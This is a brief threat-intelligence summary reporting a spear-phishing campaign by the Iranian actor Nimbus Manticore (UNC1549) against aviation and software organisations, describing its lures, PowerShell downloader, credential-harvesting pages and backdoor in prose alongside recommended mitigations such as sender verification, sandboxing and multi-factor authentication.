Iranian Threat Actor Nimbus Manticore Launches Phishing Campaign Targeting Aviation and Software Sectors
Stay vigilant for phishing emails that impersonate aviation and software companies and verify sender domains before opening attachments.
Educate staff on phishing indicators, verify sender domains, and sandbox suspicious attachments.
Summary
The Iranian state‑sponsored threat actor known as Nimbus Manticore, also referred to as Screening Serpens and UNC1549, has been linked to a new campaign that uses lures impersonating organizations in the aviation and software sectors. The campaign has spread across the United States, Europe, and the Middle East, following the joint U.S.–Israeli military operation against Iran in late February 2026. Attackers crafted spear‑phishing emails that appear to come from legitimate aviation companies and software vendors, enticing recipients to download malicious attachments or click on compromised links. The lures exploit trust in industry‑specific terminology and branding to bypass email filters and social engineering defenses. The threat actor’s tactics include using custom domains that mimic real company URLs and embedding malicious payloads in PDF or Office documents. The campaign also leverages compromised email accounts to send the phishing messages, increasing the likelihood of success. Researchers have identified the malicious payloads as a backdoor that provides remote access to the victim’s system. The activity demonstrates the actor’s continued focus on high‑profile sectors and its ability to adapt to geopolitical events.
Nimbus Manticore’s phishing emails use subject lines that reference flight schedules, maintenance updates, or software release notes, making them appear legitimate to industry professionals. The malicious attachments contain a PowerShell script that downloads a remote executable from a command‑and‑control server. The threat actor also uses a technique called “credential harvesting” by redirecting users to a fake login page that captures usernames and passwords. The campaign’s geographic scope includes the U.S., Germany, France, and Israel, indicating a coordinated effort across multiple regions. The researchers recommend verifying the sender’s domain, inspecting attachments in a sandbox, and implementing multi‑factor authentication for critical accounts.
Key changes
- Nimbus Manticore (Screening Serpens, UNC1549) launched a phishing campaign targeting aviation and software sectors.
- The campaign spread across the U.S., Europe, and the Middle East after the U.S.–Israeli operation in late February 2026.
- Spearfishing emails mimic legitimate aviation companies and software vendors, using custom domains and industry terminology.
- Malicious attachments contain a PowerShell script that downloads a remote executable from a C2 server.
- The threat actor also uses fake login pages to harvest credentials.
- Researchers identified a backdoor that provides remote access to victim systems.
- The campaign demonstrates the actor’s focus on high‑profile sectors and geopolitical timing.
- Verification of sender domains and sandboxing attachments are recommended mitigations.